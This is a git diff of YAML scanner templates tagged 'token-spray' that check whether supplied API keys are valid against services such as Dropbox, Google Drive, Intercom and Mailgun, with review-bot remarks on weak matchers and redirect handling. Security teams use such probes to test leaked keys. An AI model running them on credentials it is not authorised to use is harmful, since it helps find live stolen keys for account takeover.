a/poc/api/api-cooperhewitt-411.yaml +++ b/poc/api/api-cooperhewitt-411.yaml 
@@ -16,10 +16,6 @@ requests: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" matchers: - - type: word - part: body - words: - - '"stat":' - - '"formats":' - - '"default_format":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-debounce-414.yaml b/poc/api/api-debounce-414.yaml deleted file mode 100644 index 5165087c3d..0000000000 --- a/poc/api/api-debounce-414.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-debounce - -info: - name: DeBounce API Test - author: 0ri2N - severity: info - reference: - - https://developers.debounce.io/reference/api-key-authentication - - https://debounce.io - metadata: - max-request: 1 - tags: debounce,token-spray - -self-contained: true - -http: - - method: GET - path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" - - matchers: - - type: word - part: body - words: - - '"balance":' - - '"success":' - - '"debounce":' - condition: and - -# digest: 4b0a00483046022100e57b205a3f73c6e7e29816f801b5277bd2dbe0c6134dd792258d95567af00b53022100a1cd71dd14faa6281554f570b8499e0a59d0247273e01878709c3e6b19084032:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-debounce.yaml b/poc/api/api-debounce.yaml new file mode 100644 index 0000000000..2ed95d091b --- /dev/null +++ b/poc/api/api-debounce.yaml @@ -0,0 +1,25 @@ +id: api-debounce + +info: + name: DeBounce API Test + author: 0ri2N + severity: info + reference: + - https://developers.debounce.io/reference/api-key-authentication + - https://debounce.io + tags: debounce,token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + + matchers: + - type: word + part: body + words: + - '"balance":' + - '"success":' + - '"debounce":' + condition: and diff --git a/poc/api/api-deviantart-415.yaml b/poc/api/api-deviantart-415.yaml new file mode 100644 index 0000000000..999f0421e1 --- /dev/null 
+++ b/poc/api/api-deviantart-415.yaml @@ -0,0 +1,27 @@ +id: api-deviantart + +info: + name: DeviantArt API Test + author: zzeitlin + severity: info + reference: + - https://www.deviantart.com/developers/authentication + metadata: + max-request: 1 + tags: token-spray,deviantart + +self-contained: true + +http: + - method: POST + path: + - "https://www.deviantart.com/api/v1/oauth2/placebo" + + body: "access_token={{token}}" + matchers: + - type: word + part: body + words: + - '"status" : "success"' + +# digest: 4b0a00483046022100800735e2524013964159af06cb5f0c2ba32282bb38f18d961f592b109b7763de022100e53dfb233bb0bb614a8553e084ca457cb3b701367c471fc0fadce3ee2a66eba8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-deviantart.yaml b/poc/api/api-deviantart.yaml deleted file mode 100644 index b09e9acd2b..0000000000 --- a/poc/api/api-deviantart.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-deviantart - -info: - name: DeviantArt API Test - author: zzeitlin - severity: info - reference: https://www.deviantart.com/developers/authentication - tags: token-spray,deviantart - -self-contained: true -requests: - - method: POST - path: - - "https://www.deviantart.com/api/v1/oauth2/placebo" - body: "access_token={{token}}" - - matchers: - - type: word - part: body - words: - - '"status" : "success"' diff --git a/poc/api/api-dribbble-416.yaml b/poc/api/api-dribbble-416.yaml index ec36263d18..d9dd5f5a41 100644 --- a/poc/api/api-dribbble-416.yaml +++ b/poc/api/api-dribbble-416.yaml 
@@ -4,13 +4,17 @@ info: name: Dribbble API Test author: daffainfo severity: info + description: Dribbble is a self-promotion and social networking platform for digital designers and creatives reference: - https://developer.dribbble.com/v2/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md + - https://github.com/daffainfo/all-about-apikey/tree/main/dribbble + metadata: + max-request: 1 tags: token-spray,dribbble self-contained: true -requests: + +http: - method: GET path: - "https://api.dribbble.com/v2/user?access_token={{token}}" @@ -19,3 +23,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402207ca77c15aa3f5dc5598a37cbd3e79b882bf1ac2c6144c11a17a4832dda005035022074dd2aa3ddcdbcc547cbc65d4d0dd7033d9d0198ea69032bd1dbe3f28068a2c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-dribbble.yaml b/poc/api/api-dribbble-417.yaml similarity index 100% rename from poc/api/api-dribbble.yaml rename to poc/api/api-dribbble-417.yaml diff --git a/poc/api/api-dropbox-418.yaml b/poc/api/api-dropbox-418.yaml index cc14c60421..29679e2b2f 100644 --- a/poc/api/api-dropbox-418.yaml +++ b/poc/api/api-dropbox-418.yaml @@ -7,7 +7,6 @@ info: severity: info tags: token-spray,dropbox -self-contained: true requests: - method: POST path: @@ -16,9 +15,6 @@ requests: Authorization: Bearer {{token}} matchers: - - type: word - part: body - words: - - '"account_id":' - - '"email":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-europeana-419.yaml b/poc/api/api-europeana-419.yaml index 520c83775d..c0767ce8d7 100644 --- a/poc/api/api-europeana-419.yaml +++ b/poc/api/api-europeana-419.yaml @@ -16,6 +16,10 @@ requests: - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file 
diff --git a/poc/api/api-europeana-420.yaml b/poc/api/api-europeana-420.yaml new file mode 100644 index 0000000000..520c83775d --- /dev/null +++ b/poc/api/api-europeana-420.yaml @@ -0,0 +1,21 @@ +id: api-europeana + +info: + name: Europeana API Test + author: daffainfo + severity: info + reference: + - https://pro.europeana.eu/page/search + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md + tags: token-spray,europeana + +self-contained: true +requests: + - method: GET + path: + - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" + + matchers: + - type: status + status: + - 200 diff --git a/poc/api/api-europeana-421.yaml b/poc/api/api-europeana-421.yaml index bbc103ac30..713a3a7e6e 100644 --- a/poc/api/api-europeana-421.yaml +++ b/poc/api/api-europeana-421.yaml @@ -4,13 +4,17 @@ info: name: Europeana API Test author: daffainfo severity: info + description: European Museum and Galleries content reference: - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Europeana.md + - https://github.com/daffainfo/all-about-apikey/tree/main/europeana + metadata: + max-request: 1 tags: token-spray,europeana self-contained: true -requests: + +http: - method: GET path: - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" @@ -22,4 +26,6 @@ requests: - 'success' - 'apikey' - 'action' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a004730450220403070e888a319ba4a50aadc9e5d82db018198fb50ac63142aeca81fb62dc496022100f98c0738e60b20fb3a4dcfb88eed70705433fc0c6d902f699fc4f7de3d5de1e9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fastly-424.yaml b/poc/api/api-fastly-424.yaml new file mode 100644 index 0000000000..9688149ef5 --- /dev/null +++ b/poc/api/api-fastly-424.yaml 
@@ -0,0 +1,25 @@
+id: api-fastly
+
+info:
+ name: Fastly API Test
+ author: Adam Crosser
+ severity: info
+ reference:
+ - https://developer.fastly.com/reference/api/
+ tags: token-spray,fastly
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.fastly.com/current_user"
+ headers:
+ Fastly-Key: "{{token}}"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"created_at":'
+ - '"customer_id":'
+ condition: and
diff --git a/poc/api/api-fastly.yml b/poc/api/api-fastly.yaml
similarity index 100%
rename from poc/api/api-fastly.yml
rename to poc/api/api-fastly.yaml
diff --git a/poc/api/api-festivo-425.yaml b/poc/api/api-festivo-425.yaml
new file mode 100644
index 0000000000..df1c5858ee
--- /dev/null
+++ b/poc/api/api-festivo-425.yaml
@@ -0,0 +1,31 @@
+id: api-festivo
+
+info:
+ name: Festivo API Test
+ author: daffainfo
+ severity: info
+ description: Fastest and most advanced public holiday and observance service on the market
+ reference:
+ - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/
+ - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays
+ metadata:
+ max-request: 1
+ tags: token-spray,festivo
+
+self-contained: true
+
+http:
+ - method: GET
+ path:
+ - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"id":'
+ - '"holidays":'
+ - '"name":'
+ condition: and
+
+# digest: 490a004630440220310ec371cb4874227f93c2d3efec48996e61a2e60b9b4e7eb7c11cacabdd07e7022015e3fc75ad7459d05cc1b5cac21f7d6ef42a93c521d0354d4165c5a3743d7bbe:922c64590222798bb761d5b6d8e72950
diff --git a/poc/api/api-festivo.yaml b/poc/api/api-festivo.yaml
deleted file mode 100644
index 3911ce2636..0000000000
--- a/poc/api/api-festivo.yaml
+++ /dev/null
@@ -1,26 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - description: Fastest and most advanced public holiday and observance service on the market - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays - tags: token-spray,festivo - -self-contained: true -requests: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and diff --git a/poc/api/api-fortitoken-cloud.yaml b/poc/api/api-fortitoken-cloud.yaml index 3a49a9a760..2e71549626 100644 --- a/poc/api/api-fortitoken-cloud.yaml +++ b/poc/api/api-fortitoken-cloud.yaml @@ -3,15 +3,20 @@ id: api-fortitoken-cloud info: name: FortiToken Cloud API Test author: dwisiswant0 - reference: https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview severity: info + reference: + - https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview + metadata: + max-request: 1 tags: token-spray,fortinet self-contained: true -requests: + +http: - method: GET path: - "https://ftc.fortinet.com:9696/api/v1/user" + headers: Authorization: Bearer {{token}} @@ -26,3 +31,5 @@ requests: regex: - "error_(code|message|name)" negative: true + +# digest: 4b0a0048304602210085dec939ca5aa4774aa6f9061c9f5dd131840d9c20832e13ca23afa1257873f2022100b6641576a1409c2d37274fd46d42e9c46ff5e2e13486e63eddd92c1a1e5dba1d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fullhunt-428.yaml b/poc/api/api-fullhunt-428.yaml deleted file mode 100644 index 482e0add20..0000000000 --- a/poc/api/api-fullhunt-428.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: api-fullhunt - -info: - name: FullHunt API Test - author: 0ri2N - severity: info - description: | - FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet. - reference: - - https://fullhunt.io - - https://api-docs.fullhunt.io - metadata: - max-request: 1 - tags: scan,recon,fullhunt,token-spray - -self-contained: true - -http: - - method: GET - path: - - https://fullhunt.io/api/v1/domain/interact.sh/details - - headers: - X-API-Key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"dns"' - - '"hosts"' - - '"domain"' - condition: and - -# digest: 490a0046304402204f47d3dda160c97d6d7dbbc58055bd71e3f56df6076538d0fe0e889984987ebc02206ba9c340c581b0432223893d5b1138c0c07420a3e5213c0d9e4a9c7257df938f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fullhunt.yaml b/poc/api/api-fullhunt.yaml new file mode 100644 index 0000000000..dd160e504b --- /dev/null +++ b/poc/api/api-fullhunt.yaml @@ -0,0 +1,29 @@ +id: api-fullhunt + +info: + name: FullHunt API Test + author: 0ri2N + severity: info + description: | + FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet. + reference: + - https://fullhunt.io + - https://api-docs.fullhunt.io + tags: dns,scan,recon,fullhunt,database,token-spray + +self-contained: true +requests: + - method: GET + path: + - https://fullhunt.io/api/v1/domain/example.com/details + headers: + X-API-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"dns"' + - '"hosts"' + - '"domain"' + condition: and diff --git a/poc/api/api-google-drive-432.yaml b/poc/api/api-google-drive-432.yaml new file mode 100644 index 0000000000..f66896d7c3 --- /dev/null +++ b/poc/api/api-google-drive-432.yaml 
@@ -0,0 +1,28 @@ +id: api-google-drive + +info: + name: Google Drive API Test + author: geeknik + severity: info + reference: + - https://developers.google.com/drive/api/guides/about-sdk + metadata: + max-request: 1 + tags: token-spray,google,drive,intrusive + +self-contained: true + +http: + - raw: + - | + GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 + Referer: {{referer}} + Content-Type:application/json + + matchers: + - type: word + part: body + words: + - 'File not found: {{randstr}}.txt.' + +# digest: 4b0a00483046022100f3d2e430755236cb5354472588b85c1caa009551fffb628d51c8321a8c900fd3022100c756303eff99e074d92d5f4b223322b94572b1515b741fee9473fa14cc0984ef:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-google-drive.yaml b/poc/api/api-google-drive.yaml deleted file mode 100644 index b274fd83c5..0000000000 --- a/poc/api/api-google-drive.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-google-drive - -info: - name: Google Drive API Test - author: geeknik - severity: info - reference: - - https://developers.google.com/drive/api/guides/about-sdk - tags: token-spray,google,drive - -self-contained: true -requests: - - raw: - - | - GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 - Referer: {{BaseURL}} - Content-Type:application/json - - matchers: - - type: word - part: body - words: - - 'File not found: {{randstr}}.txt.' diff --git a/poc/api/api-hirak-rates-436.yaml b/poc/api/api-hirak-rates-436.yaml deleted file mode 100644 index 0557cf59fe..0000000000 --- a/poc/api/api-hirak-rates-436.yaml +++ /dev/null 
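Review bot: The raw request in api-google-drive-432.yaml needs a `referer` variable (`Referer: {{referer}}`) as well as `token`, but nothing in `info:` says so; the api-google-drive.yaml deleted below used `{{BaseURL}}` there instead. A line such as `description: Checks a Google API key against the Drive API; requires the token and referer variables.` would tell the operator what to supply. The key is also placed in the URL (`%3fkey={{token}}`), so it will show up wherever the scanning side logs or stores requests.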
@@ -1,32 +0,0 @@ -id: api-hirak-rates - -info: - name: Hirak Exchange Rates API Test - author: daffainfo - severity: info - description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits - reference: - - https://rates.hirak.site/ - - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates - metadata: - max-request: 1 - tags: token-spray,hirak - -self-contained: true - -http: - - method: GET - path: - - "https://rates.hirak.site/stat/?token={{token}}" - - matchers: - - type: word - part: body - words: - - '"token":' - - '"plan":' - - '"hits":' - - '"remain":' - condition: and - -# digest: 4b0a00483046022100feb1b70cc116a0e5e28e60351b93907f2994f9f53d4f5ce7337bd1e5581d1f95022100932bf3b672f01049a27014ca2bac8996fb16ac2f4ab829bdf96a780ecd3620ec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-hirak-rates.yaml b/poc/api/api-hirak-rates.yaml new file mode 100644 index 0000000000..6d61403334 --- /dev/null +++ b/poc/api/api-hirak-rates.yaml @@ -0,0 +1,27 @@ +id: api-hirak-rates + +info: + name: Hirak Exchange Rates API Test + author: daffainfo + severity: info + description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits + reference: + - https://rates.hirak.site/ + - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates + tags: token-spray,hirak + +self-contained: true +requests: + - method: GET + path: + - "https://rates.hirak.site/stat/?token={{token}}" + + matchers: + - type: word + part: body + words: + - '"token":' + - '"plan":' + - '"hits":' + - '"remain":' + condition: and diff --git a/poc/api/api-hubspot.yaml b/poc/api/api-hubspot.yaml deleted file mode 100644 index 86566864f0..0000000000 --- a/poc/api/api-hubspot.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: api-hubspot - -info: - name: HubSpot API Test - author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners - severity: info - tags: token-spray,hubspot - -requests: - - method: GET - path: - - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - - matchers: - - type: word - part: body - words: - - 'error' - negative: true diff --git a/poc/api/api-iconfinder-439.yaml b/poc/api/api-iconfinder-439.yaml new file mode 100644 index 0000000000..1d396884b1 --- /dev/null +++ b/poc/api/api-iconfinder-439.yaml @@ -0,0 +1,34 @@ +id: api-iconfinder + +info: + name: IconFinder API Test + author: daffainfo + severity: info + description: Web Icons + reference: + - https://developer.iconfinder.com/reference/overview-1 + - https://github.com/daffainfo/all-about-apikey/tree/main/iconfinder + metadata: + max-request: 1 + tags: token-spray,iconfinder + +self-contained: true + +http: + - raw: + - | + GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 + Host: api.iconfinder.com + Accept: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"icons":' + - '"is_icon_glyph":' + - '"download_url":' + condition: and + +# digest: 4a0a0047304502203525d06ca37e214ea31d40d32b70a0e233bf879bee960cbb34fb4436a8c78320022100a678e3bcbc2678eaa6fe709c8b1210b528254b68294b4ce07620fbe1c000ed6f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-improvmx-440.yaml b/poc/api/api-improvmx-440.yaml deleted file mode 100644 index a8aa0d0bdd..0000000000 --- a/poc/api/api-improvmx-440.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: api-improvmx - -info: - name: ImprovMX API Test - author: daffainfo - severity: info - description: API for free email forwarding service - reference: - - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx - metadata: - max-request: 1 - tags: token-spray,improvmx - -self-contained: true - -http: - - raw: - - | - GET https://api.improvmx.com/v3/account HTTP/1.1 - Authorization: Basic {{base64(':' + token)}} - Host: api.improvmx.com - - host-redirects: true - max-redirects: 1 - matchers: - - type: word - part: body - words: - - '"billing_email":' - - '"cancels_on":' - - '"company_details":' - condition: and - -# digest: 4a0a00473045022100db35cda579311d7b993f8e4fb034c403ba8a5a5ea00221d77f6650a00814fa4902207fbfec013eb2a1c5bf89081ba3c5aa547ebe8b8a6db4f329cd99701c70307b32:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-improvmx.yaml b/poc/api/api-improvmx.yaml new file mode 100644 index 0000000000..fb6c00f0d9 --- /dev/null +++ b/poc/api/api-improvmx.yaml @@ -0,0 +1,30 @@ +id: api-improvmx + +info: + name: ImprovMX API Test + author: daffainfo + severity: info + description: API for free email forwarding service + reference: + - https://improvmx.com/api + - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx + tags: token-spray,improvmx + +self-contained: true +requests: + - raw: + - | + GET https://api.improvmx.com/v3/account HTTP/1.1 + Authorization: Basic {{base64(':' + token)}} + Host: api.improvmx.com + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: body + words: + - '"billing_email":' + - '"cancels_on":' + - '"company_details":' + condition: and diff --git a/poc/api/api-instagram.yaml b/poc/api/api-instagram.yaml index 7a9e6301f0..fc463c8bac 100644 --- a/poc/api/api-instagram.yaml +++ b/poc/api/api-instagram.yaml 
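Review bot: `redirects: true` in the new api-improvmx.yaml allows the request to follow a redirect to any host, where the api-improvmx-440.yaml deleted above used `host-redirects: true`. The request carries `Authorization: Basic {{base64(':' + token)}}`, so the redirect should stay on api.improvmx.com; whether the engine strips that header on a cross-host hop cannot be seen from here. I would write `host-redirects: true` and keep `max-redirects: 1`.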
@@ -3,16 +3,12 @@ id: api-instagramgraph info: name: Instagram Graph API Test author: zzeitlin + reference: https://developers.facebook.com/docs/instagram-api/getting-started severity: info - reference: - - https://developers.facebook.com/docs/instagram-api/getting-started - metadata: - max-request: 1 tags: token-spray,instagram,graph self-contained: true - -http: +requests: - method: GET path: - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" @@ -25,5 +21,3 @@ http: - '"access_token":' - '"name":' condition: and - -# digest: 4a0a004730450220146bd47f0c375401f1e505bb59c118fb400158865929ccc4a0a1e3e998bb6c8c022100931ce1826228f7c66289078fc9eaeda2ef2c5d0491318933400ca518e9073b89:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-instatus-442.yaml b/poc/api/api-instatus-442.yaml deleted file mode 100644 index dfd968d1b3..0000000000 --- a/poc/api/api-instatus-442.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: api-instatus - -info: - name: Instatus API Test - author: daffainfo - severity: info - description: Post to and update maintenance and incidents on your status page through an HTTP REST API - reference: - - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/tree/main/instatus - metadata: - max-request: 1 - tags: token-spray,instatus - -self-contained: true - -http: - - method: GET - path: - - "https://api.instatus.com/v1/pages" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"subdomain":' - - '"name":' - - '"logoUrl":' - condition: and - -# digest: 4a0a00473045022100850e53c92a054ffcf08500f345965b5674f65e8974a2d82117d4c127f613fcff02207fa1e6c159c8c013d78f0137271ff8bcba2204413bd77bb35fa6a1d25dc7c4d0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-instatus.yaml b/poc/api/api-instatus.yaml new file mode 100644 index 0000000000..1175f1b8b3 --- /dev/null +++ b/poc/api/api-instatus.yaml 
@@ -0,0 +1,29 @@
+id: api-instatus
+
+info:
+ name: Instatus API Test
+ author: daffainfo
+ severity: info
+ description: Post to and update maintenance and incidents on your status page through an HTTP REST API
+ reference:
+ - https://instatus.com/help/api
+ - https://github.com/daffainfo/all-about-apikey/tree/main/instatus
+ tags: token-spray,instatus
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.instatus.com/v1/pages"
+ headers:
+ Authorization: Bearer {{token}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"id":'
+ - '"subdomain":'
+ - '"name":'
+ - '"logoUrl":'
+ condition: and
diff --git a/poc/api/api-intercom-443.yaml b/poc/api/api-intercom-443.yaml
new file mode 100644
index 0000000000..4ae7ce807b
--- /dev/null
+++ b/poc/api/api-intercom-443.yaml
@@ -0,0 +1,30 @@
+id: api-intercom
+
+info:
+ name: Intercom API Test
+ author: dwisiswant0
+ severity: info
+ reference:
+ - https://developers.intercom.com/building-apps/docs/rest-api-reference
+ metadata:
+ max-request: 1
+ tags: token-spray,intercom
+
+self-contained: true
+
+http:
+ - method: GET
+ path:
+ - "https://api.intercom.io/users"
+
+ headers:
+ Authorization: Bearer {{token}}
+ Accept: application/json
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Access Token Invalid"
+ negative: true
+
+# digest: 4b0a00483046022100961f1591bb9414b8304809c1253739861d2e47d3555bf7caaf47cb719aec2ad602210082a496a018342802274a471a3bfd500c4e82ac6eefe13a1efc643e102609fcbc:922c64590222798bb761d5b6d8e72950
diff --git a/poc/api/api-intercom.yaml b/poc/api/api-intercom.yaml
deleted file mode 100644
index 5c0dc15191..0000000000
--- a/poc/api/api-intercom.yaml
+++ /dev/null
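Review bot: The only matcher in api-intercom-443.yaml is a negative word match on "Access Token Invalid", so any response without that string (a rate-limit reply, a 5xx page, a proxy block page) is reported as a working token. Pair it with a positive check: set `matchers-condition: and` and add a `type: status` matcher for `200`, or match a field of the user list body. api-iterable-445.yaml (negative on `BadApiKey` / `RateLimitExceeded`, with an inline comment admitting it) and api-pendo.yaml (negative on status 403) further down this patch have the same weakness.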
@@ -1,24 +0,0 @@ -id: api-intercom - -info: - name: Intercom API Test - author: dwisiswant0 - reference: https://developers.intercom.com/building-apps/docs/rest-api-reference - severity: info - tags: token-spray,intercom - -self-contained: true -requests: - - method: GET - path: - - "https://api.intercom.io/users" - headers: - Authorization: Bearer {{token}} - Accept: application/json - - matchers: - - type: word - part: body - words: - - "Access Token Invalid" - negative: true diff --git a/poc/api/api-ipstack.yaml b/poc/api/api-ipstack-444.yaml similarity index 100% rename from poc/api/api-ipstack.yaml rename to poc/api/api-ipstack-444.yaml diff --git a/poc/api/api-iterable-445.yaml b/poc/api/api-iterable-445.yaml new file mode 100644 index 0000000000..0c1f84d566 --- /dev/null +++ b/poc/api/api-iterable-445.yaml @@ -0,0 +1,23 @@ +id: api-iterable + +info: + name: Iterable API Test + author: zzeitlin + reference: https://api.iterable.com/api/docs + severity: info + tags: token-spray,iterable + +requests: + - method: GET + path: + - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" + headers: + Api_Key: "{{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/poc/api/api-iterable.yaml b/poc/api/api-iterable.yaml deleted file mode 100644 index b559444b8f..0000000000 --- a/poc/api/api-iterable.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-iterable - -info: - name: Iterable API Test - author: zzeitlin - severity: info - reference: https://api.iterable.com/api/docs - tags: token-spray,iterable - -self-contained: true -requests: - - method: GET - path: - - "https://api.iterable.com/api/catalogs" - headers: - Api_Key: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"name":' - - '"catalogNames":' - condition: and 
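Review bot: api-iterable-445.yaml requests an absolute URL but has no `self-contained: true`, which the api-iterable.yaml deleted in the same patch did have. Without it the template presumably runs once per scan target and resends the same `Api_Key` to api.iterable.com each time; add `self-contained: true` above `requests:`. The probe also changes from `/api/catalogs` to an `export/data.json` call, which is a heavier request than a key check needs. api-pendo.yaml and the new side of api-openweather-473.yaml lack `self-contained: true` too.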
diff --git a/poc/api/api-jumpcloud.yaml b/poc/api/api-jumpcloud-446.yaml similarity index 100% rename from poc/api/api-jumpcloud.yaml rename to poc/api/api-jumpcloud-446.yaml diff --git a/poc/api/api-linkfinder.yaml b/poc/api/api-linkfinder.yaml index 38c579ea74..719a8c37dc 100644 --- a/poc/api/api-linkfinder.yaml +++ b/poc/api/api-linkfinder.yaml @@ -19,4 +19,4 @@ requests: - type: regex name: relative_links regex: - - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) + - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) \ No newline at end of file diff --git a/poc/api/api-lokalise-452.yaml b/poc/api/api-lokalise.yaml similarity index 100% rename from poc/api/api-lokalise-452.yaml rename to poc/api/api-lokalise.yaml diff --git a/poc/api/api-mailchimp-454.yaml b/poc/api/api-mailchimp-454.yaml deleted file mode 100644 index 5232ddda97..0000000000 --- a/poc/api/api-mailchimp-454.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-mailchimp - -info: - name: Mailchimp API Test - author: zzeitlin - severity: info - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration - tags: token-spray,mailchimp - -self-contained: true -network: - - inputs: - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - read: 1024 - host: - - "tls://smtp.mandrillapp.com:465" - - matchers: - - type: word - words: - - "success" diff --git a/poc/api/api-mailchimp.yaml b/poc/api/api-mailchimp.yaml index 9d7073e46c..5232ddda97 100644 --- a/poc/api/api-mailchimp.yaml +++ b/poc/api/api-mailchimp.yaml 
@@ -3,10 +3,11 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration severity: info + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration tags: token-spray,mailchimp +self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" diff --git a/poc/api/api-mailgun-455.yaml b/poc/api/api-mailgun-455.yaml index ac24bdb9b4..dfa06bdfaa 100644 --- a/poc/api/api-mailgun-455.yaml +++ b/poc/api/api-mailgun-455.yaml @@ -4,23 +4,17 @@ info: name: Mailgun API Test author: zzeitlin severity: info - description: Email Service - reference: - - https://documentation.mailgun.com/en/latest/api-intro.html - - https://github.com/daffainfo/all-about-apikey/tree/main/mailgun - metadata: - max-request: 1 + reference: https://documentation.mailgun.com/en/latest/api-intro.html tags: token-spray,mailgun self-contained: true - -http: +requests: - method: GET path: - "https://api.mailgun.net/v3/domains" - headers: Authorization: Basic {{base64('api:' + token)}} + matchers: - type: word part: body @@ -29,5 +23,3 @@ http: - '"items":' - '"created_at":' condition: and - -# digest: 490a00463044022017959a95e024fcff4806de7f1fdb66380733e2cbd2d6769373fe14805ba0525902206f514f2f93928486eb249ff9b41d2f9ab0583e9f54a55b0d804cf31a9f0e61e5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-malshare-456.yaml b/poc/api/api-malshare-456.yaml index d486f6f0fd..b1108b4e33 100644 --- a/poc/api/api-malshare-456.yaml +++ b/poc/api/api-malshare-456.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://malshare.com/doc.php - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md tags: token-spray,malshare self-contained: true 
